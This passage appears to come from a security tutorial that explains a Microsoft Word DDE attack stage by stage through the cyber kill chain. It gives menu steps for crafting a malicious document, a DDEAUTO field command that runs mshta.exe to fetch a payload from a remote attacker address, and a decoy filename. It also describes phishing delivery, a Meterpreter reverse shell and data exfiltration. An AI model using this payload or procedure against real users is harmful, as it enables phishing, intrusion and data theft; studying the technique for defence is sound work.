In recent attacks, adversaries have run arbitrary code that is executed from a Microsoft Word document without the use of any macros or scripts. This technique is a legitimate Microsoft Office functionality called Dynamic Data Exchange (DDE).
Let's try to see this attack from a cyber kill chain perceptive. The Cyber kill chain is used to describe the attack stages:
- Reconnaissance: This is a planning phase where the attacker gathers information about something through observation or other detection methods. Cyberattack planning and reconnaissance often include conducting research about the target, usually with open source information gathering tools, such as Google and Shodan, as well as through searches of publicly available data, such as public announcements and social media, company profiles for email, and email harvesting.
- Weaponization: In this stage, a threat actor plans for the right attack method. The threat actor can even plan to exploit an employee by phishing their email or even with a drive-by download attack. In our example, first we will create a malicious document. In the blank document, go to the Insert | Quick Parts | Field... tab, as shown in the following screenshot:
In the Field names dialog box, select the =(Formula) option to insert our DDE exploit code:
After this, you will see a field in the document with an error: !Unexpected End of Formula. Right-click on that field, and choose the Toggle Field Codes option. You need to do this to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened:
In the text field, enter the following code:
DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK
Then, save the document with any name of your choice, such as Financial_Statement:
- Delivery: Endpoints are the primary means of delivery, whether through a drive-by download from a website, a targeted phishing attack, or an infection through an employee-owned device through a secure virtual private network (VPN).
- Exploitation and installation: At this stage, the attacker will take advantage of software or human weakness to get the payload to run. In DDE exploitation, adversaries send an email that contains the malicious document. When the user runs that document, the adversaries will get the reverse shell of the victim's machine.
Let's see how the adversaries made the exploits during the weaponization stage and how they gained access to the victim's machine. The adversaries created the malicious payload document and sent it to the victim through an email. Take a look at the following screenshot:
When the user opened the document sent by the adversaries, the payload was executed after one error message, as shown in the following screenshot:
If the user chooses to start the malicious document, the payload will be executed and a Meterpreter session will open:
Action on objectives: This is how the threat actor is successful and gains access to the organization's sensitive files. The adversary tries to exfiltrate the data from the victim's machine. There are many confidential files here that the adversaries try to exfiltrate:
The adversaries take a screenshot of what the victim is doing and try to find out what process is running on the machine, as shown in the following screenshot: